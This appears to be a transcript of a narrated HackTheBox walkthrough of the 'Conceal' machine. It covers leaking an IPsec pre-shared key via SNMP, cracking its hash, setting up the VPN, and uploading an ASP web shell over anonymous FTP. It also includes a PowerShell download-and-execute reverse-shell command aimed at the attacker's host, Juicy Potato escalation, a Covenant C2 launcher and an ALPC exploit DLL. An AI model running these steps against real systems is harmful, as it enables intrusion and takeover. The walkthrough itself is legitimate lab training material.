What's going on YouTube? This is IPSEC, and we're going to be doing Conceal from HackTheBox, which was a really fun and unique box because all the difficulty was up in that initial recon portion of the box. You had to do a bunch of enumeration in order to get the IPSEC parameters in order to configure either Strongswan or a Windows VPN, so you could establish a secure tunnel to Conceal in order to enumerate the TCP ports. Once you do that, the box falls pretty quickly. It's got a FTP server that you can log in with Anonymous and upload files to, and then a web server which can execute files you uploaded. And then once you get a shell back, you have the SE impersonation right, which lets you use Juicy Potato to escalate up to administrator. And there's a second privask through the Sandbox Escaper ALPC exploit. So since there's a VPN configuration and two different privasks, we're going to do this box twice, once with Linux, once with Windows, so you can see both exploits and both ways to configure VPNs. And before we get into this, I'm going to apologize because I don't know how this is going to go. I got back from vacation at 8 p.m. Friday night, and within 15 hours, this video has to be uploaded, or I want it to be uploaded. So, didn't get much time to prepare. So, with that being said, let's jump in. Like every other box, we can begin with the NMAP with -SC for default scripts, SV, enumerate versions, OA, output all formats, put in the NMAP directory and call it Conceal, and then the IP address, which is 10.10.10.116. It does take some time to run, so I've already ran it. Looking at the results, we see absolutely no ports are open. So in this case, I'm going to ping the host, and if we look, NMAP actually does say the host is up, not offline. So this probably isn't a mistake, but I'm just going to ping it anyways, and this will tell us what type of OS it is. We see the TTL is 127. So it's most likely going to be a Windows box. If it was in the 60s, Linux. If it's in the 200s, it's some network switch or something like that. So we know it's most likely Windows. Let us start a full NMAP scan. So -p- does all ports. That's 1 through 65,535. And then we'll do -OA, output all formats, put in the NMAP directory and say Conceal, all TCP, and then 10.10.10.116. I'm also going to do a nmap-su to do UDP ports, -OA do nmap conceal, 1000 UDP is what I'm going to call it, and do 10.10.10.116. I'm also going to specify -vvv for verbose, and this will output open ports as it does find them. I should have done it for the TCP, I just forgot. We can hit VVV now and increase the verbosity, so that should be fine. While that runs, I'm just going to check some things manually. SNMP is a common thing, so I'm going to do SNMPWalk -c public -v2c, which is just default stuff for Windows, and public is default for everything. But we'll do 10.10.10.116, and we get information back. Right away, we see that the system's giving us some Ike VPN password pre-shared key, or PSK. So I'm just going to copy this, and I'm going to go over to Cherry Tree, and then just start creating some notes. So this is from Open SNMP, and we got this pre-shared key. If we do echo-n and paste this, do wc-c, it's 32 characters. So I'm just going to go to hashes.org. And you could do a bunch of other sites, like Hashkill is another one. I just like hashes.org, or you can send it to the Kraken. But I'm going to go to hashes search, click this, TP9K4PP. And when I say send it to the Kraken, I mean just crack it manually ourselves. But we see hashes.org tells us this is a MD5 sum for DudeCake1. So go into Cherry Tree, and then we'll just put, we can just paste that. So all this other information is just SNMP MIBs we don't have, and we could configure all that, but the easier thing to do is SNMP-check. If you do -h, you could specify different ports, communities, versions, etc. But since this is all default, we don't have to do that, so we'll just do SNMP-check 10.10.10.116, and it's going to try to connect to it and use public. Looking back over at our NMAP, we can see that one port is discovered open, that is 500 UDP. Going back over here, we'll give SNMP-check some time to run and see what it outputs. SNMP-check is now finished. It took probably another 45 seconds after that. I'm just going to cut the video so you don't have to wait for this to go and watch grass grow, or watch a cursor blink in this case. But just going to the top, let's see everything SNMP-check says. We have the host IP address, we know that. Conceal, we have the hardware information, Windows version 6.3, build 15063, so we can always copy this build. Go to Firefox, Google Windows, build that, and if we search 15063, we see this is going to be mobile? No, PC. Around July 11th, 2019. And it's I'm not sure what else this tells us. Maybe it tells us that it is Enterprise Edition or not. I don't believe so. I'm sure it'll say later on exactly what that says. But going down, let's see. We have network interface information. So this will tell us potentially if there's IPv6 in play. So looking at this, let's see. Don't see anything yet. MAC address. Don't really get any IP addresses. But looking at this netstat information, we don't see IPv6. And maybe SNMP-check just doesn't do the IPv6 MIBs. So it could be something we want to look more into. But either way, looking at this, we just see IPv4 right now. Routing information. Seeing this and not seeing any subnets we don't recognize tells us there's probably no VMs in play. If you had like VMware or something, you'd see routes to either 192 or 172 addresses. We don't see that, so we can be relatively confident this is just one box and not going to be a multi-layer type of thing. Looking at TCP connections, we do see there are TCP ports, 21, 80, 135, 445, so FTP, HTTP, SMB, a bunch of ephemeral stuff, and SMB again. So I'm just going to copy this, and we're going to go back over to Cherry Tree and do TCP ports, paste this, and then go back down, and we have a bunch of UDP ports as well. If we go back over to our NMAP, we do see, looks like it's only found one UDP so far, but we do have 123, which is NTP, 161, which is SNMP, 500, which is going to be IPSEC Ike, which is Internet Key Exchange. Then we have 4500, which is, I think, IPSEC NAT Traversal. 5050, not sure what it is. 5353, that's some type of multicast DNS thing. 5355, this is LLMNR, Link Local LAN Manager. This is what Responder abuses. It does NetBIOS queries and things like that. So if we're on the same subnet as this box and make it do a DNS request, we may be able to grab a hash via Responder. 137, 138, this is going to be some SMB stuff. 1900, this is, I think, UPnP. So if we saw other things up in the routing table and had different hosts, I'd probably try to abuse UPnP to try to get stuff routed to it. Ephemeral stuff, I don't know what this port is. 1900. We already said that, UPnP. And then another ephemeral thing, so that I don't know. We got network services, telling us all the services installed in this box. Processes, which is good to know. We see VMware, so we know this is most likely going to be a VM. Storage information, CD, memory. Nothing too interesting. Some device information. IIS information. This is the Windows version of Apache. And that is about it. So we got a lot of information. And based upon the UDP, which I did not put, let's do UDP ports, and let's go up to UDP, grab these. I'm going to start looking into Ike, or IPSEC VPNs, because again, this, we can just label these real quick. NTP, Network Time Protocol, can't really abuse it. SNMP, already abused. Ike, we will abuse. This is ISA KMP, will abuse. I think that's what it is. IPSEC. 500 and 4500 are essentially the same thing. 5500, unknown. This is 5353, MDNS. This is LLMNR. SMB, SMB, 1900, UPnP, and unknown, UPnP, unknown. So, since we don't have any other host to abuse, we're going to rule out UPnP, which really leaves us left with just IPSEC stuff. So I'm going to run ike-scan 10.10.10.116, and we get a result back. I'm also going to run -A for aggressive mode, and I think that's it. ike-scan -H, and if we look, let's see. Search for aggressive or -A. Yep. So aggressive mode will tell us the hash of a pre-shared key, which honestly we don't need because if we look up here, we already have it. But it's not configured to do aggressive mode, so we can't steal the hash, but we already know the pre-shared key. So I'm going to run 10.10.10.116 again, and I'm going to do -M, which I think just stands for multi-line to make this a bit easier to read. We have HDR, which is the handshake request or response. It's a handshake something. Not really important. SA, the security association, and we get a bunch of things. So let's do, where's Jerry Tree? Let's do VPN config. And that's what we need. So let's see. Just split this up. Hash SHA-1 group mod P off PSK. We know this is dude cake 1 exclamation point, and we got that from SNMP. Lifetime, seconds, life duration 4, and this is in hex. So we need to convert this to decimal, so we can just do Python -C for command, and I think it's print int, I think, for integer, the hex, and then 16 for base 16. Let's see if that works. If not, we'll just go online. It does. So we get 28,800, which I think this is 8 hours. So this is going to be seconds. And if we just Google seconds to hours, 8 hours. So we have a lot of information about the VPN now. So we have to install a IPSEC tunneling program, which is called Strongswan. So do apt install Strongswan. And this is just like the de facto standard IPSEC VPN thing for Linux. And it's a very, very finicky configuration. This latest things cause it to not work, and troubleshooting it is a pain in the butt. So we'll find this out and try to walk through how to set this up. Now that Strongswan is installed, we can begin configuring it, which is done through 2 configuration files. The first one we're going to go over is ipsec.secrets. And I'm doing the command so we can see exactly how this works. This is what you'd read to understand it. I'm just going to copy the example for a pre-shared key. And we're going to do vi etsy ipsec.secrets. And then we just paste what we copied. The IP address we take out. And we're going to put 10.10.10.116, which is Conceal's IP address. And then the pre-shared key which I think was dude cake 1. We can go back here, grab it, paste. And now whenever we make a IPSEC connection through Strongswan to this IP address, it will use this pre-shared key. So the next file we want is ipsec.conf. And this is a big one. I'm actually going to split it horizontally. We can exit this pane and do man ipsec.conf. And then let's do vi etc ipsec.conf. So we kind of got an example here with things we need. So we're going to do conceal. This is just labeling it. And then the first thing we're going to want is to do a type. And this tells us what exactly the VPN is for. Is it going to be for transport, tunnel, whatever? If we search this for type, let's see. If we do type equals, will that do it? Search down for type. Let's see. Come on, where is type? The same type can be configured. It should tell us the options. There we go. We can do tunnel, transport, transport proxy, pass through, or drop. The type we want is transport. If this doesn't work, then we try tunnel next. The reason why I'm not doing tunnel is I think tunnel generally requires new IP addresses to be assigned, and we're not going to be doing that. We don't have any information on what the remote subnet would be. If I saw in the routing table in SNMP, we had other subnets, then I may do the type as tunnel and then define that subnet, if that makes sense. Next thing we want is key exchange, and we didn't actually go over this, so let's do this real quick. ike-scan 10.10.10.116 -M. We stopped at security association. There are these VIDs, which is vendor ID. Essentially, this is hashes that get looked up and fingerprints, essentially. So we have a Windows 8 fingerprint, which probably just means it's a Windows VPN box. We have RFC 3947, which is NAT traversal. We have this one, draft IETF IPSEC NAT-T IKE 02. A lot of people may confuse this for IKE version 2, but if we look into this by just Googling it, we'll see this goes to the RFC page, and the 02 is just a revision number for this RFC, not saying it's IKE version 2. IKE fragmentation supported, Microsoft negotiation discovery capable, and then we have IKE CGA version 1. So that's why I'm thinking it's a version 1 VPN. So IKE v1, and you could also in ike-scan do I think -v2. That did not do it. Maybe it did. We didn't get anything, so let's do -h real quick. -2. -v was probably verbose and 2 was specified too, but we don't get anything back with IKE 2, so assuming IKE version 1. And then left, this is going to be us. You just think of it visually, the left side of the connection and the right side of the connection. So 10.10.14.3, that should be our IP address. If we do ifconfig ton0, we get 10.10.14.3. Then right, this is going to be the right side, which is 10.10.10.116. Then we want to do auth by PSK for pre-shared key. Then ESP, the encapsulating security payload. We're getting this from the VPN config here, and it's going to be triple des SHA-1. So 3 des SHA-1, and then we get the IKE key, which is 3 des SHA-1 mod P1024. And again, we got that from ike-scan. That's this group 2 thing. We could search the man page for lifetime and do lifetime equals 8 hours. So IKE lifetime equals 8H for 8 hours. I think that's a lifetime ike-scan is showing. It could also be this one. So there's two different lifetimes it could be. You can read that to understand the difference. And let's do auto equals start and see what happens. So we'll do IPSEC start no fork, and we get a error message at the end, invalid ID information. So the best troubleshooting for IPSEC stuff I've ever found is on the netgate page, which does pfSense, which is an OpenBSD based firewall. But you do netgate IPSEC troubleshoot. This is a really good document that just shows all the common error messages and shows the requester and responder. So search for this. It's in phase 2, which means we passed phase 1, so it's probably not going to be relating to the pre-shared key or anything. IPSEC has 2 phases. Phase 1 is the internet key exchange phase. This is where it gets the channel ready to transmit a key, and it assumes the channel's insecure, so it does a bunch of Diffie-Hellman and whatnot to secure that, and that goes into phase 2, known as the ISA-KMP. That is the, I think, Information Security Association Key Management Protocol. Let's see, stands for Internet Security Association and Key Management Protocol, and that's going to be where the actual policy information and tunneling is set up. So we get phase 2 network mismatch. So looking at this, we have one really odd thing. We could dive down a rabbit hole of setting a bunch of lifetimes and things like that, but I think lifetimes would be phase 1. The thing that kind of sticks out to me is we have IPSEC on the Windows, and it's only configured for TCP because we can't hit any TCP port. Our SNMP-check showed TCP was open. If we go over into Cherry Tree, we see TCP ports 445, but we can't get to 445. So if we do nmap-p 445-PN to ignore the host discovery protocol, just so it goes a bit quicker, and then specify 10.10.10.116, we get nothing. But UDP, it works. So our VPN is only, or not VPN, IPSEC is only configured for TCP on the Windows side, and it is a very finicky protocol. So if we do, it's, I think, left, it's, what is it? Go back into search. Let's do left proto. No, not that. I don't want to search for proto. What is it? I know it's deprecated. Let's see. Deprecated. If I could spell. This parameter is deprecated. Let's see. Auth by. I don't care. Left proto port. That's what I want. Proto port. I think the correct way to specify it is like TCP %any, which means TCP on any port. But I got issues when trying that. If we can try that real quick. We can do TCP %any. And that's how it says it in the man page. But if I do it, it's unable to resolve that. So that's why I'm not doing it that way. So we'll do left proto port equals TCP, and then right proto port equals TCP. So let's try running this again. And we don't end with an error message. Everything looks good. If we go over here, we can try nmap-p 445. We can just do the same thing we did. And it should say filtered. And that is because Nmap defaults to a SYN scan. If we do a full TCP scan, instead of just sending the SYN packet, we actually complete the handshake, we see it's open. You can't do SYN scans through a VPN with Nmap. So, with anything, I don't think. So, that's why you have to specify -S capital T. I think Nmap's default is -SS. So, thing to note is always be cautious with Strongswan VPN configurations because it is picky. Even though we had everything set up, it just decided not to work because we tried to say, hey, let us send anything down this pipe. And the receiving end was like, whoa, we only allow TCP down this pipe. So we're going to ignore everything and drop your connection. So now that we have that, we can just go back here. We don't need these nmaps anymore. So let's just do nmap-sc-s -sc for save scripts, -sv for enumerate versions. Then we'll do -st for full TCP socket connection, -oa all ports. We'll do conceal TCP IPSEC, and then 10.10.10.116. But we can cheat because SNMP told us what TCP ports were open. We have FTP, HTTP, and SMB. So the first thing I'm going to do is let's just check SMBMap, because if this doesn't work, we're immediately done. So 10.10.10.116, finding open ports, status denied, nothing. So we could do like crackmap exec SMB 10.10.10.116, and this may tell us, if I did the syntax correct, if it's SMB signing. And we have signing is equal to false. So this is going back to the saying LAN manager open. Its signing is false, and we see it's doing LLMNR, the link local LAN manager. So we may be able to do like an SMB relay attack to this box if we were able to get a hash from a domain admin or something. But since this is a single box, not a network, we don't have that attack to go into. So we're going to try FTP with anonymous. So FTP 10.10.10.116, anonymous, and we get logged in. So I'm going to make a dir FTP, just so we stay organized what we upload to it. We can echo test to, actually instead of test, we'll echo please subscribe to test.txt, and then do FTP 10.10.10.116, anonymous, put test.txt, and it says it's uploads. So let's go over to the HTTP server, 10.10.10.116, and we just get the IIS page. So I'm going to try going to robots.txt, see if there's anything there. We get a 404. I'm going to try /uploads, and I'm going to try /upload, and we see /upload is a directory. We just guessed that, and we see we could get to that file. So now we know we can upload files through FTP, and then we can execute them. Or not execute them, we know we can access them. So now we test if we can actually execute files. So let's do echo test to test.aspx, and this is just a common extension for Windows, and we did not put it, so let's put test.aspx. No such file. Oh, I'm not in FTP. So move that into FTP. Let's go in FTP, and then put that again. Put it in, and I have a typo. Helps if I typed. It's a different 404, 404.3. Moved has name change or is unavailable because the extension configuration. So the page is a script, add a handler. Let's try putting that again. Test.aspx. So it's a 404.3, and it's saying something about the extension configuration. So let's try putting a move test.aspx to just test.asp and put this in. And then if this fails, then I'll probably try like PHP next. But we see test.asp works, so let's try putting a ASP shell. So a good place for web shells is the GitHub repository tennc. So let's just clone this. It is the web shell directory. So let's go in opt, git clone, tennc web shell. And then let's go into Webshell and then do find dot, and we will grep for .asp dollar to simulate, say, end of line. And then let's grab, let's do this fuzzDB Webshell cmd asp.asp thing. So we'll copy this into HTTP boxes conceal, and we'll call this just cmd.asp. Make it a bit simpler. Go into the directory, and we have to put this in the FTP directory. We'll go in there to make it easy. And then let's put cmd.asp. Service not available, so let's connect again. Anonymous, put cmd.asp. We have put it up there. So let's go to 10.10.10.116, upload cmd.asp, and we get a 500 error. So what I'm going to do is let's move cmd.asp to cmd.asp.back and try getting the file. Get cmd.asp, and operation not complete successfully because the file contains a virus or potentially unwanted software. So we cannot download that. So what we will do instead is find a different web shell. So let's do find opt web shell, and we will grep for ASP again, and then this time I'm going to grep for web shell and see if I find any here. Webshell.asp. I'm going to use this one. So we will copy that into this directory, and let's put webshell.asp, and we will go there and see what happens. Okay, looks like it's working. If we do dir, we have command inject execution. One small thing that, because we're doing a multiple layers on a VPN, you may have weird issues. So one thing I recommend, I haven't ran into them, but in ipsec.conf, I would recommend putting, let's do it in this window. We'll tear it down real quick. I would probably put fragmentation equals yes, because we did see this in the ike-scan. We do 10.10.10.116. It supports ike fragmentation, so I would definitely add that. And if we search this config for fragmentation, you'd see yes, except force and no. So I would put that there. And the other thing I may do is, if you're still having weird issues, I just changed the MTU maximum transmission unit to 1000. If I do if config ton 0, I see the MTU is set to 1000. And the reason why is because we are doing, if we do Tor, let's do onion diagram. Look at this picture. We're not using Tor, but it's just a diagram to illustrate what we're doing. And I'm not sure if this is going to be an issue, but I've ran, like, this issue has killed days of me in previous lives. So this is a message. Pretend the red is the message. Ignore this. So pretend that's our message. And we built this message assuming the maximum transmission size was 1500. Then we added on IPSEC. IPSEC adds between 50 and 55 bytes. And then we added on OpenVPN. So we added another layer, and OpenVPN, I think, is 69 bytes of overhead. So we added 100 bytes to a packet that we built, assuming it was 1500 bytes. So we essentially added, I think, 7% overhead with these two tunneling protocols. If we added another, then things could also get wonky. So if you run into issues when you're doing multiple VPNs, just change the MTU down. You don't have to go all the way down to like 1000. You could go down to like 1382 would be a good one. And I just say that because Windows default MTU I think is 1492. So that gives you around 100 bytes of slack. But yeah, just something I recommend doing if you run into weird issues. We didn't do it here because I don't know why, but I would expect you to run into issues, or some people to run into issues. So we tore down the IPSEC, so we have to put it back up. So let's go here and do IPSEC. Was it this window? Fragmentation equals yes. IPSEC start no fork starts it up. So now 404 file not found. One annoying thing is this will clean off the FTP every few minutes. So we have to put it back up. Okay. So we verified we had command execution. Let us get a reverse shell. And to do that, we'll use Nishang. I'm making a directory HTTP just to stay organized. I'll do cp opt Nishang shells. Not that. Is it invoke TCP? What is it? PowerShell TCP.ps1. And we'll just call this rev.ps1, so we have to type that. And then YY to yank, P to put, delete this. The port, of course, it has to be 9001 because it's got to be over 9000. Doesn't have to be, but just a habit. So change the IP address to my IP address, 10.10.14.3. And now we can do python-m simple. Yeah, we can do it in this directory, that's fine. Python-m simple HTTP server on port 80. And then we'll do netcat lvnp 80. Is it RLWRAP? I do have RLWRAP. And we want 9001. RLWRAP is just going, it's like read line wrapper. It'll give me my arrow keys. We'll do it both with and without it to show what it's doing. Then I can just do PowerShell IEX new object net.web client download string HTTP 10.10.14.3 rev.ps1. I'm going to copy this before I run it because the web server deleted it again. So let's try putting it and then click run again. We see it got our shell and then we got the shell here. So what read line wrap is going to do, if I do whoami, I can hit up arrows, I can hit left and right. I control Z out of the shell. If we get rid of this and then hit this again, there we go. Who am I? And my up arrow, it sends all the control characters, so I can't do all that stuff. So that's why I like this read line wrapper. Paste, run, shell. So now we have a shell on the box. The first thing I'm going to do is a whoami/all because we got a shell from the HTTP user and we know it's Windows 10 from previous enumeration, and we have this SE impersonation privilege and it's enabled, so we know if we use Juicy Potato we should be able to get root on this box. So the first thing to do is go download Juicy Potato. So Juicy Potato GitHub. And if it was Windows 2019, I don't think this will work. I don't know if it works on fully patched 2016 yet. I believe it will work on fully patched 2016. I think only 2019 fixes it. But let's... I don't want to git clone. I want to go to releases. And then juicypotato.exe. Save file. And then we can go to... Let's do FTP, and let's move downloads Juicy Potato here, and then go back to our shell, put juicypotato.exe. Let's exit FTP because we timed out. Put juicypotato.exe. Sent the file. dirc : cd/dir inetpub www.root. And there's an interesting directory in the root, admin checks, so we will look into that. But let's go to inetpub www.root, upload, and Juicy Potato. So let's copy juicypotato.exe to users. Let's see who we are. So copy juicypotato.exe to users, destitute, music, just a directory we should have write access to. Probably typed it. Copy juicypotato.exe to users. Let's just copy and paste this. And we'll just do documents. There we go. So if we go to this directory, do /juicypotato.exe, we get failed to run. This specified executable is not valid for this application. So generally this means that we try to run a 64-bit app on a 32-bit machine. If I do dir/, we see two program files, one x86. So we know this is a 64-bit machine. If we go back to our FTP directory, do file on Juicy Potato, and this says it's a 64-bit application. The issue is we were not in binary mode when we uploaded it. We uploaded it in ASCII mode of FTP, so that's why you see that error. cd FTP, let's just move this to j.exe and put j.exe. Go back to a shell. We can copy this, upload j.exe. When we execute this, we have everything we want. So the last thing I want to do is make a bat file. So let's v please subscribe.bat. Let's do PowerShell ix new object net.web client download string http 10.10.14.3 rev.ps1. And the reason why I'm uploading this via FTP is because of both of these quotes. This double quote and this single quote. It's a pain in the butt to do a echo command using both those quotes to direct it to a file. So creating the file in a text editor and then using FTP to put it there. So I don't have to worry about all of that potential issues. So we can now cp this directory, please subscribe.bat. Here, if we type please subscribe.bat, we get the command. As long as I didn't typo that, we should be good. The only thing we will have to do is another netcat session, so nclvnp 9001. So let's do /j.exe -t star to try both, create process with token and create process as user, -p program to launch, c : all of this. The reason why I'm copying and pasting is so I can't make a typo. Paste that, and then -l, a COM server port to listen on, 9002 I guess. We could do 9001, this port doesn't matter whatsoever. And we get a error message. So it's testing with this CLS ID, which is a bits admin, I think, or we'll find out what that CLS ID is. Let's just Google CLSID juicy potato. And it was improperly hardened to try to prevent this exploit from working. Yeah, it's a bits port. But if we look, let's see. All of these will give also things. The Xbox Live stuff I'm not going to use, that may not be there, but this Windows Update service will probably be enabled. So let's copy this, hit the up, and let's specify -C for CLSID, put it in single quotes. I just got that from here. Run this. Create process OK. We got a hit and we get a shell. So if I do whoami, we are NT authority /system. So that is the box one way. I'm going to do this box on Windows. And when we do it on Windows, we're going to do a different privask that I haven't done yet. CD administrator, no S. And I didn't do the read line wrap, so I can't just hit up. dir desktop. So this shows we are root. So let us now switch over to Windows and do this box again. So now we're on the Windows box. It is a pretty clean install of Windows minus the install of Commando VM. And if you don't have that, you can just go to GitHub, Mandiant, Commando, and install this. It takes a few hours to install, but it is relatively nice. I like it. I think I installed it in the Antivirus Evasion Mimikatz video. So I did that. I'm also connected to the HackTheBox VPN, but I cannot do nmap-p 445-st 10.10.10.116 because we haven't set up the IPSEC VPN yet. We see its port is now, or is still filtered. So to set up the IPSEC VPN on Windows, we go into the firewall config, advanced settings to pop up this box, go to connection security rules, new rule, and create a custom rule. Any IP address, let's say endpoint 1. This is like left and right of Strongswan. So computers at endpoint 2, we could specify 10.10.14.0/24. That should work. We could just do any as well. Authentication, cross authentication for inbound and outbound. That should be fine. Let's see, authentication method to use. We want to do advanced, customized, and specify add pre-shared key, which is not recommended, and put dudecake1 exclamation point. Click OK. Next, the port protocol, we're going to specify TCP. If we left this as any, then IPSEC is applied to everything, and we wouldn't be able to do that SNMPWalk against the box. So we know it's configured in TCP mode because UDP was left untouched by IPSEC, but TCP was. So that is the hint there. Click Next. Apply this to all 3 profiles, sure, and the name. We'll call this Conceal. And we have now added that. So if I do that nmap command again, we have 445 as open. So we know that is done correctly. The one thing I'm going to do, let's see, what mode are we in? I'm just going to disable this because I don't know what I'm in right now. So inbound connections allow everything. Not recommended to do, but I'm lazy. And we can also do IPsec stuff here. So inbound connections are allowed, and I did that so when I set up my HTTP server and reverse shells and stuff, I don't have to worry about anything. So now the box is relatively the same. So FTP 10.10.10.116, and we can do anonymous. So let's do something a little bit different and use the Covenant as a C2 protocol. It's a .NET C2 protocol. So I think COBBR.NET Covenant. And we're going to grab this. So let's do new tab. We'll do git clone, paste this in, and we need elite as well. So let's grab elite. Once this finishes cloning, we can start the next one. So elite is the client and Covenant is the server. So we can go into Covenant, go into Covenant again, and do .NET run. If you install .NET on Linux or Kali, this should work. Let's see. We need .NET SDK 2.2. So let's install this. This is becoming more of an issue than I thought it would. Install .NET Core 2.2. Linux, Mac, Windows. Let's do x64. Compatible with Visual Studio 2017, which is what I have. Let's do this package, 22107. And show this, because we only want the one that is compatible with what we have. And there we go. It's done downloading. Run 22107. And let's see. Ideally, when you update Covenant, this won't be an issue, because hopefully this package will be added to it. I should have done that first. You update update Commando with cups all. After this video, I'll create a GitHub ticket if it's still an issue and they haven't fixed this. But wait for this to install. There we go. It has been installed. So let's try .NET run. And it looks like it is working. So we open up a new terminal. And when this opens, we will go to Elite. Go into Elite again. .NET run. And I can't connect this until Covenant is up and running. And I don't think it ran. .NET run. Try this again. Git submodules have not been initialized. So when I did this, I should have ran that command. So cd ... and we will run this. And this is going to install a bunch of the submodules. So the Covenant is nice because it's a .NET application that does reflective execution of executables. So when I want to run like seatbelt, I don't have to upload seatbelt to the victim. I can just type execute seatbelt and it loads it in memory and executes it. So that's why this C2 is nice. Cobalt Strike does the same thing, but that's paid. This is free. So that's why I was showing this. .NET run. And Silent Trinity, I believe, also will do that. But we've done Silent Trinity in a previous video. So there we go. Username. Let's do IPSEC. Password. IPSEC. And creating cert. So we can go over here. .NET run. We could specify the hash, so we only connect to this, which helps prevent man-in-the-middle attacks. Computer name 127001. Username IPSEC. Password IPSEC. Covenant hash. So this is where we could copy this hash, paste it. So now we'll only trust this hash, which again helps prevent man-in-the-middles. And we have a session in Covenant. If we do help, we have three things: grunts, launchers, listeners. Listeners are listeners. You should know what that is. That's going to be like HTTP things. Launchers launch grunts. Grunts is the agent, the C2 agent. So the first thing is to go into listeners. I think it's options or show. show. So HTTP, and then is this options? Let's do help, show. Show is config. So we can set connect address to be 10.10.14.3, which I believe is our IP. We can get out of FTP now. Just do ipconfig. And we see, yes, we are still 10.10.14.3. So that looks good. So we can do start to start it. And we see we are listening on 10.10.14.3, port 80. After this, we need to go back to, and we can do help again. We want to do launchers, which is like a stager. We'll do PowerShell because that's what we're familiar with. We'll set the listener name to our AAAEE thing, and we will do help. And let's just generate the PowerShell launcher. So we can copy and paste this whole thing. Let's see. Maybe we can copy and paste it. Hold Shift. Click. Oh no. Come on, scroll down. I'm really not a fan of this cmd thing. Maybe we'll install like bash on. Didn't mean to paste. I was saying maybe I'll install like bash on Windows and put tmux. Let's do edit, copy, and now we want to go into Sublime, paste, and let's see. We don't need this PowerShell stuff. It's not doing like encoding or anything, so we can just get rid of that. Get rid of this last parenthesis, so we just have raw PowerShell, and we can save as. Let's go into C:\users ipsec desktop, and we'll make a directory called Conceal. And we'll go in here and save this as rev.ps1. So we got the PowerShell script done. We have to now get the web shell. So let's go to tennc, web shell, raw, grab, Sublime, new, paste, save as, webshell.asp. So we have that. So let's upload it. So FTP 10.10.10.116, anonymous, and we can actually we have to quit because we're not in the correct directory. We're going to go into Conceal, and now we can FTP 10.10.10.116, anonymous, put webshell.asp, and we also have to create a Python listener. So Python 3.7. Oh, Python's not my path. That's trash. Conceal. I think it's C:\Python 2.7, python.exe-m, simple HTTP server. Okay. So now we can go 10.10.14.3, web shell, and we have to upload it again, playing this game. Put it, go to web shell. Now I can do PowerShell, ix new object net.web client, download string, HTTP 10.10.14.3, port 8000, rev.ps1. Click run. Go back to cmd. See, we have not got it yet. So we screwed up this command. So we can just paste it. Oh no, we got it. It was just going slow. So have a hit. Looking at this, looks like we have started getting a listener, as maybe this is new, maybe it's not, but we will just wait on this screen for a agent callback. It can take like 15-20 seconds after you get that. So there we go. We have grunt has been activated. So if we go back to grunts, we now see we have that grunt, so we can do interact 877. And if we do help, we have a list of everything we can do. So one of the built-in things is seatbelt, which is like power up, I guess. So we can do seatbelt, I think all, to do all checks. Let's just do user checks. So seatbelt user. And if we go to Ghost Pack, seatbelt, this will tell us the instructions. So let's see. Seatbelt all will run with all checks. We can specify checks. Seatbelt user collects this data. Maybe we should do all to get this. We'll do all next. Or a system. We'll do system next. So let's go back to CMD. And we see seatbelt has ran. Current user, Firefox, Chrome, IE, Windows Vaults. So let's do seatbelt system to run those checks. And while that goes, let us download Merlin or Watson. So Watson, Rasta Mouse, GitHub. Okay. And then we should, I guess, open up a new window here. And we'll do git clone Rasta Mouse Watson, because we don't have any releases that we can just compile. So let's go to desktop, Watson, and open it up. And this is why having Commando is nice, because it installs Visual Studio and everything else. If we go back into here, we can see seatbelt has ran and what it has enumerated. So let's see. Scrolling all the way up. Basic OS information. We have Windows 10 Enterprise, reboot schedule, current privileges. This tells us we have the SE impersonate, so we could do the juicy potato. UAC policies, PowerShell versions, audit settings, Windows event forward settings, definitely useful information to know. LSA settings, telling us stuff about password stuff, I guess. Environment variables, system variables, user folders. WMI got stopped. Current user settings. Lapse is not installed. RDP host, map drives, firewall stuff. So you can see just a bunch of useful information in this, but nothing that really helped us. So let's do Watson. And I think we have to change the build to .NET Framework 4.5. Let's see if we can compile it as .NET 2. Let's do no. Let's leave it at 4.5 and see if it works. So build, rebuild solution. So it's building, built it to here. So copy, go over to CMD, and we should be able to just help. There should be an assembly execute maybe. There we go. Paste it, and we'll see what happens. So it's been assigned to run. If it fails, we'll have to change the .NET version. That's the main downside to this. Nope, there we go. So we have Watson running and what it detects, and we have CVE 2018-8440, and this is the ALPC exploit from Sandbox Escaper, if you remember that last year. There are these up here, which it's probably vulnerable to, but generally with CVEs, I go with one where I know there's a POC, and generally the latest one, because sometimes these earlier ones get superseded, which means they're no longer effective, and it's just a false positive. But generally the latest ones from these type of things is a good starting spot. So I don't want to use Metasploit. I'm going to use a script from Mumbai on HackTheBox. It's GitHub Real Unique, I think is his username. Mumbai. Let's see. Maybe it's Real Original. There we go. It's Real Original, not Real Unique. And we want to do the ALPC Diag Hub. And let's see, he has it compiled for us. So we can just download this. And look at his usage instructions, example payload. So here's an example. Let's see. So we put the ALPC executable, a payload, and then we can do anything.rtf, I guess. So let's try this. I haven't actually ran this before. So let's do C++ reverse shell and get a reverse shell POC. So this should work. Let's do Visual Studio 2017 and hope I have C++ here. File, new project, Visual C. I don't have C++ here. Just .NET. Visual C++. Really don't feel like installing more things. Let's see. Wait, we have a template here. DLL right here. Oh, not present in this installation. Yeah, so we'd have to add .NET stuff, because I don't know if I can just create, C++ stuff. Apologies for the sloppy cut. I'm just switching over to Linux because it's quicker to install the dependencies to compile a C++ DLL. So, and I'm pretty strapped for time. So I'm making sure I have min-gw-w64 installed, and now we can just get a reverse shell DLL, so C++ reverse shell. Grab this. Let's go to GitHub, actually. Whoops. I don't want that one. There we go. That's what I want. Reverse shell POC. Copy this. And we will create rev.cpp. Paste. Set paste. Paste this in. And see what we have to edit. Looks like the IP address. So 10.10.14.3. And we'll do 9001 because I don't think that's in use yet. And that should be fine. So in an ideal world, we would have added the whatchamacallit, the Covenant payload to this. So we're not doing a reverse shell, but I'm running low on time right now. So it is what it is. x86 64, w64 min-gw g++, and then we call rev.cpp -o rev.dll, And we got a link, ls winsock, and then shared. I think that's it. If config eth0, I'm 172.16.10.153. So SMB serve dash SMB to support share pwd. Okay, 172.16.10.153. 172.16.10.153. Share, and we grab this DLL. So imagine we compiled this on our Windows box. So we'll just copy this to C users IPSEC desktop, covenant, not covenant, we want conceal. And then we want to grab the thing out of downloads. So downloads ALPC, paste this in. We'll call this, what did he call it? Oh, we have to add this to a DLL. So let's go back to Kali, go into rev.cpp, and what modifications do we have to do to add this? First, is this in clipboard? It is. Set paste, paste this in. We can move windows.h up. So what this line is doing is it's just saying, hey, on the DLL process attach action, do something. So what do we have to modify? Well, this can't be main anymore. This has to be a thing. So let's delete and then do void Rev Shell, and that should be fine. Up here, we have to call it void Rev Shell that, and then stupid casing, and here we can just call it. So Rev Shell, and that may compile if we're lucky. Warning, so it looks like it compiled well. Let's hope this works. So copy here, refresh. Oh, that's 